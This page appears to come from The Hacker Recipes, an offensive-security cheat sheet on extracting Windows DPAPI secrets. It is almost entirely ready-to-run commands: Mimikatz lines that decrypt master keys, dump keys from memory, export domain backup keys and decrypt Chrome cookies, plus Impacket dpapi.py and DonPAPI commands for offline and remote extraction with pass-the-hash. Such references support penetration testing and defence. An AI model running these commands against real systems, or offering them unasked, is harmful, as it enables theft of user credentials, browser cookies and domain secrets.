DPAPI secrets | The Hacker Recipes

Source for the below items

On Windows systems Mimikatz (C) can be used…

# Extract and decrypt a master key
dpapi::masterkey /in:"C:\\Users\\$USER\\AppData\\Roaming\\Microsoft\\Protect\\$SUID\\$GUID" /sid:$SID /password:$PASSWORD /protected

# Extract and decrypt all master keys
sekurlsa::dpapi

# Extract the backup keys & use it to decrypt a master key
lsadump::backupkeys /system:$DOMAIN_CONTROLLER /export
dpapi::masterkey /in:"C:\\Users\\$USER\\AppData\\Roaming\\Microsoft\\Protect\\$SUID\\$GUID" /pvk:$BACKUP_KEY_EXPORT_PVK

# Decrypt Chrome data
dpapi::chrome /in:"%localappdata%\\Google\\Chrome\\User Data\\Default\\Cookies"

# Decrypt DPAPI-protected data using a master key
dpapi::cred /in:"C:\\path\\to\\encrypted\\file" /masterkey:$MASTERKEY

From UNIX-like systems, DPAPI-data can be manipulated (mainly offline) with tools like dpapick (Python), dpapilab (Python), Impacket's dpapi.py and secretsdump.py (Python).

# (not tested) Decrypt a master key
dpapi.py masterkey -file "/path/to/masterkey_file" -sid $USER_SID -password $MASTERKEY_PASSWORD

# (not tested) Obtain the backup keys & use it to decrypt a master key
dpapi.py backupkeys -t $DOMAIN/$USER:$PASSWORD@$TARGET
dpapi.py masterkey -file "/path/to/masterkey_file" -pvk "/path/to/backup_key.pvk"

# (not tested) Decrypt DPAPI-protected data using a master key
dpapi.py credential -file "/path/to/protected_file" -key $MASTERKEY

DonPAPI (Python) can also be used to remotely extract a user's DPAPI secrets more easily. It supports pass-the-hash, pass-the-ticket and so on.

bash

DonPAPI.py 'domain'/'username':'password'@<'targetName' or 'address/mask'>